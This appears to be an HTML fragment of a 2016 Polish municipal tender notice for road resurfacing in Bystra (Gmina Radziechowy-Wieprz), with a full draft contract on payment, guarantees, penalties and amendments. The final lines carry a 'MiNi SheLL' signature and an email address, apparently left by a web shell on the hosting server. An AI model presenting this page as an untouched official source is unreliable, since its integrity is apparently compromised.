              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br /><b> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna</b><br /><div style="padding-left: 20px"></div><b> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej</b><br /><div style="padding-left: 20px"></div><b>Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych</b><br /><div style="padding-left: 20px"></div><b> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień</b><br /><div style="padding-left: 20px"></div><b> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: </b><div style="padding-left: 20px"><br /><b>Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:</b></div><b> Termin otwarcia licytacji elektronicznej</b><br /><div style="padding-left: 20px"></div><b> Termin i warunki zamknięcia licytacji elektronicznej</b><br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy
              <br /><div style="padding-left: 20px">Umowa ../2016

zawarta w dniu ..2016r.  w Wieprzu  pomiędzy:
Gminą Radziechowy-Wieprz, Wieprz 700, 34-381 Radziechowy
NIP 553-246-88-35,  REGON 072182670
reprezentowaną przez: 
.. 
..
..
zwaną w treści umowy Zamawiającym 
a  
.. 
..
..
zwanym w treści umowy Wykonawcą 
Po przeprowadzeniu postępowania w trybie przetargu nieograniczonego (OR.271.10.2016) na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U.2015.2164 z dnia 22.12.2015r.)  została zawarta umowa o następującej treści:

§ 1
1.	Zamawiający zleca, a Wykonawca przyjmuje do wykonania zamówienie, którego przedmiotem jest: Odbudowa wypłukanej nawierzchni na całej długości drogi do Brańka
w miejscowości Bystra, w km 0+000 do 0+170. Przedmiot zamówienia winien być wykonany zgodnie ze Specyfikacją Istotnych Warunków Zamówienia wraz z załącznikami oraz ofertą Wykonawcy.
2.	Przedmiot zamówienia obejmuje wykonanie robót budowlanych wraz z pracami towarzyszącymi niezbędnymi do prawidłowego wykonania zamówienia. 
3.	Wykonawca oświadcza, że przed podpisaniem umowy zapoznał się ze wszystkimi warunkami i materiałami, które są niezbędne do wykonania przez niego przedmiotu umowy. Nieoszacowanie, pominięcie elementów robót czy brak rozpoznania przedmiotu zamówienia nie może być podstawą do żądania zmiany ceny określonej w umowie przez Wykonawcę. Koszty tych prac będą obciążały wyłącznie Wykonawcę.

§ 2
1.	Wykonawca wykona przy udziale podwykonawców niżej wskazane części zamówienia:
.
2.	Pozostałe roboty Wykonawca wykona własnymi siłami.
3.	W przypadku zmiany albo rezygnacji z podwykonawcy, o którym mowa w ust. 2, wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
4.	Jakakolwiek przerwa w realizacji przedmiotu umowy wynikająca z winy podwykonawcy będzie traktowana jako przerwa wynikła z przyczyn zależnych od Wykonawcy i nie może stanowić podstawy do zmiany terminu zakończenia robót, o którym mowa w § 5.
5.	Wykonawca odpowiada za działania i zaniechania podwykonawców jak za swoje własne.
6.	Wykonawca pełni funkcję koordynatora w stosunku do wszystkich podwykonawców.
 

§ 3
1.	Zamawiający za wykonanie przedmiotu zamówienia, o którym mowa w § 1 zapłaci Wykonawcy wynagrodzenie ryczałtowe ustalone w oparciu o złożoną ofertę w łącznej wysokości .zł (słownie:..).
2.	Wynagrodzenie, o którym mowa w ust.1 zostanie zapłacone na rachunek bankowy Wykonawcy o nr  w terminie wskazanym na fakturze, nie krótszym jednak niż 30 dni.
3.	Wykazane przez Wykonawcę w Zestawieniu cenowym ceny ryczałtowe za poszczególne elementy zamówienia obowiązują w okresie trwania umowy i nie będą podległy zmianom.

§ 5
Wykonawca zobowiązuje się wykonać zamówienie w terminie ..
§ 6
1.	Nadzór inwestorski nad realizacją robót z ramienia Zamawiającego sprawować będzie . 
2.	Inspektor nadzoru działa w granicach umocowania nadanego mu przez Zamawiającego oraz zgodnie z przepisami ustawy z dnia 7 lipca 1974 r. Prawo budowlane (tekst jedn. Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.).

§ 7
1.	Kierowanie robotami objętymi umową Wykonawca powierza ..
2.	Zmiana kierownika budowy wymaga wcześniejszej zgody Zamawiającego. 

§ 8
1.	Zamawiający zobowiązuje się przystąpić do odbioru wykonanych robót budowlanych w ciągu 10 dni od daty zgłoszenia ich zakończenia. Zamawiający dokonuje odbioru z udziałem Wykonawcy.
2.	Zamawiający sporządza protokół odbioru, który stanowić będzie podstawę do zapłaty faktury. Protokół podpisują strony umowy. 
3.	Koszty usuwania wad ponosi Wykonawca. Termin usunięcia wad określi Zamawiający, przy czym będzie on nie krótszy niż 3 dni, a nie dłuższy niż 14 dni. W przypadku nie dotrzymania wyznaczonego terminu przez Wykonawcę Zamawiający naliczy Wykonawcy należne kary umowne określone w § 12.
4.	Wykonawca wykona we własnym zakresie oraz poniesie koszty projektu tymczasowej organizacji ruchu.

§ 9
Za wykonanie przedmiotu umowy Zamawiający zapłaci Wykonawcy na podstawie faktury, 
w terminie 30 dni od dnia dostarczenia do siedziby Zamawiającego prawidłowo wystawionej faktury.


§ 10
1.	Wykonawca udziela Zamawiającemu .. miesięcznej gwarancji oraz rękojmi liczonej od dnia odbioru końcowego przedmiotu umowy.
2.	W ciągu 7 dni po upływie okresu gwarancji Zamawiający dokonuje odbioru pogwarancyjnego. Wykonawca zobowiązuje się usunąć usterki zgłoszone w okresie gwarancji bądź stwierdzone w wyniku tego odbioru, w terminie natychmiastowym, nie dłuższym niż 7 dni.

§ 11
1.	Ustala się zabezpieczenie należytego wykonania umowy w wysokości 5% wynagrodzenia (brutto) określonego w §3 ust. 1, które wynosi odpowiednio: które winno być wniesione przez Wykonawcę najpóźniej w dniu podpisania umowy.
2.    Zabezpieczenie może być wniesione w jednej lub kilku formach przewidzianych art. 148 ust.1 ustawy prawo zamówień publicznych:
a) pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
3.    Zamawiający zwróci zabezpieczenie należytego wykonania umowy:
- 70%- w terminie 30 dni od dnia bezusterkowego wykonania przedmiotu zamówienia 
- 30%- w ciągu 14 dni po upływie okresu rękojmi za wady.
4.  Jeżeli zabezpieczenie będzie składane w postaci gwarancji bankowej lub ubezpieczeniowej, gwarancja ta powinna być bezwarunkowa i na pierwsze żądanie. Termin ważności gwarancji winien być równy: okresowi rękojmi powiększonemu o 14 dni  w zakresie kwoty stanowiącej 30% zabezpieczenia tj.: 
oraz terminowi końcowego wykonania robót powiększonemu o 30 dni  w zakresie kwoty stanowiącej 70% zabezpieczenia tj.: 
5.   Zabezpieczenie wnoszone w formie pieniężnej winno zostać wniesione na rachunek bankowy Zamawiającego ... najpóźniej w dniu podpisania umowy. Datą wniesienia zabezpieczenia jest w takim wypadku data wpływu środków na konto Zamawiającego. 
6.  Na wypadek zamiaru wniesienia zabezpieczenia w postaci gwarancji bankowej lub ubezpieczeniowej treści gwarancji winna wcześniej zostać uzgodniona z Zamawiającym.

§ 12
1.	Wykonawca zapłaci Zamawiającemu karę umowną za każdy dzień opóźnienia w wykonaniu przedmiotu zamówienia w wysokości 0,2 % łącznego wynagrodzenia umownego (brutto) określonego w § 3 ust. 1 niniejszej umowy.
2.	Wykonawca zapłaci Zamawiającemu karę umowną w wysokości 10% łącznego wynagrodzenia umownego brutto określonego w § 3 ust. 1 za wykonanie całości robót w wypadku wadliwego oznakowania prowadzonych robót, bądź tymczasowej organizacji ruchu. 
3.	Ponadto Wykonawca wypłaci Zamawiającemu karę umowną w wysokości 0,2 % wynagrodzenia umownego (brutto) określonego w § 3 ust. 1 niniejszej umowy za każdy dzień zwłoki w usunięciu wad zgłoszonych w ramach gwarancji przedmiotu umowy, a także za każdy dzień opóźnienia w usunięciu wad stwierdzonych przy odbiorze robót. 
4.	W przypadku odstąpienia od niniejszej umowy przez Zamawiającego, z przyczyn, za które odpowiedzialność ponosi Wykonawca, Wykonawca jest zobowiązany zapłacić Zamawiającemu tytułem kary umownej  10 % wynagrodzenia umownego (brutto) określonego w § 3 ust. 1 niniejszej umowy.
5.	Zamawiający zastrzega sobie prawo odstąpienia od umowy w przypadku nie podjęcia realizacji zobowiązania przez Wykonawcę w okresie miesiąca od dnia podpisania niniejszej umowy.
6.	Zamawiający może na zasadach ogólnych dochodzić od Wykonawcy zapłaty odszkodowania przewyższającego wysokość ustalonych kar umownych.
7.	W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach. W takim wypadku dostawca lub wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy.
8.	Wykonawca wyraża zgodę na potrącenie kar umownych z przysługującego mu wynagrodzenia. 

§ 13
1.	Wykonawca oświadcza, że w przypadku, gdy umowa ubezpieczenia od odpowiedzialności cywilnej wygaśnie bądź straci swoją ważność w trakcie realizacji zamówienia, to zobowiązuje się do jej przedłużenia lub zawarcia nowej  na cały okres realizacji zamówienia, na warunkach odpowiadającym wymaganiom przeprowadzonego postępowania o udzielenie zamówienia publicznego.
2.	Wykonawca ponosi odpowiedzialność za ewentualne szkody powstałe na majątku osób trzecich i Zamawiającego związane z wykonywaniem przedmiotu zamówienia oraz zobowiązuje się do ich usunięcia na własny koszt. 
§ 14
1.	Wszelkie zmiany i uzupełnienia treści umowy wymagają formy pisemnej, pod rygorem nieważności.
2.	W przypadkach przewidzianych w umowie dopuszcza się wprowadzanie zmian za zgodą Zamawiającego.
3.	Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.
4.	Propozycja zmian umowy inicjowana przez Wykonawcę nie ma charakteru roszczeniowego.
5.	Zmiany mogą być spowodowane:
a)	obniżeniem kosztu wykonania robót,
b)	poprawą wartości lub podniesienia sprawności ukończonych robót budowlanych,
c)	zmianą obowiązujących przepisów,
d)	stwierdzeniem nieuwzględnionych w umowie warunków geologicznych, hydrogeologicznych, wykopalisk, wyjątkowo niekorzystnych warunków klimatycznych, a także innych uniemożliwiających kontynuowanie umowy na przewidzianych w niej warunkach,
e)	siłą wyższą.
6.	Dokonanie zmian wymaga podpisania aneksu do umowy. 




§ 15
Spory wynikłe na tle realizacji niniejszej umowy rozstrzygane będą przez sąd rzeczowo właściwy dla siedziby Zamawiającego.

§ 16
W sprawach nieuregulowanych postanowieniami niniejszej umowy, mają zastosowanie przepisy ustawy Prawo zamówień publicznych oraz przepisy Kodeksu Cywilnego.

§ 17
Umowę sporządzono w dwóch jednobrzmiących egzemplarzach.



ZAMAWIAJĄCY                                                              WYKONAWCA

</div><br /><b> Wymagania dotyczące zabezpieczenia należytego wykonania umowy</b><br /><div style="padding-left: 20px">Zamawiający będzie wymagał złożenia zabezpieczenia należytego wykonania umowy od  Wybranego Wykonawcy w wysokości  5 % brutto wartości umowy.
15.  Zabezpieczenie może być wniesione w jednej lub kilku formach przewidzianych art. 148 ust.1 ustawy prawo zamówień publicznych.
16. Jeżeli zabezpieczenie będzie składane w postaci gwarancji bankowej lub ubezpieczeniowej, gwarancja ta powinna być bezwarunkowa i na pierwsze żądanie. Termin ważności gwarancji winien być równy: okresowi rękojmi powiększonemu o 14 dni  w zakresie kwoty stanowiącej 30% zabezpieczenia oraz terminowi końcowego wykonania robót powiększonemu o 30 dni  w zakresie kwoty stanowiącej 70% zabezpieczenia.
17. Obowiązkiem wykonawcy jest wniesienie zabezpieczenia należytego wykonania umowy przed jej zawarciem. W przypadku wniesienia zabezpieczenia w formie pieniężnej żądana przez Zamawiającego kwota winna zostać wpłacona w pełnej wysokości przelewem na rachunek bankowy Gminy Radziechowy - Wieprz przed zawarciem umowy. Wniesienie zabezpieczenia należytego wykonania umowy w w/w postaci jest skuteczne dopiero z chwilą uznania rachunku Gminy Radziechowy - Wieprz kwotą zabezpieczenia. Stosowne dokumenty potwierdzające wniesienie zabezpieczenia w innych formach winny zostać złożone w kasie Gminy Radziechowy - Wieprz przed zawarciem umowy.
18. Pozostałe warunku dotyczące zabezpieczenia należytego wykonania umowy regulują art. 148-151 Ustawy
</div><br /><b>Informacje dodatkowe:</b><br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Wszelkie zmiany i uzupełnienia treści umowy wymagają formy pisemnej, pod rygorem nieważności.
2.	W przypadkach przewidzianych w umowie dopuszcza się wprowadzanie zmian za zgodą Zamawiającego.
3.	Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.
4.	Propozycja zmian umowy inicjowana przez Wykonawcę nie ma charakteru roszczeniowego.
5.	Zmiany mogą być spowodowane:
a)	obniżeniem kosztu wykonania robót,
b)	poprawą wartości lub podniesienia sprawności ukończonych robót budowlanych,
c)	zmianą obowiązujących przepisów,
d)	stwierdzeniem nieuwzględnionych w umowie warunków geologicznych, hydrogeologicznych, wykopalisk, wyjątkowo niekorzystnych warunków klimatycznych, a także innych uniemożliwiających kontynuowanie umowy na przewidzianych w niej warunkach,
e)	siłą wyższą.
6.	Dokonanie zmian wymaga podpisania aneksu do umowy
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br />
              Środki służące ochronie informacji o charakterze poufnym
              <br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b>22/08/2016 godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br /><br />
              Wskazać powody:
              <br /><br /><b>Język lub języki, w jakich  muszą być sporządzone wnioski o dopuszczenie do udziału w postępowaniu lub oferty</b>Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                do: 22/09/2016<br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com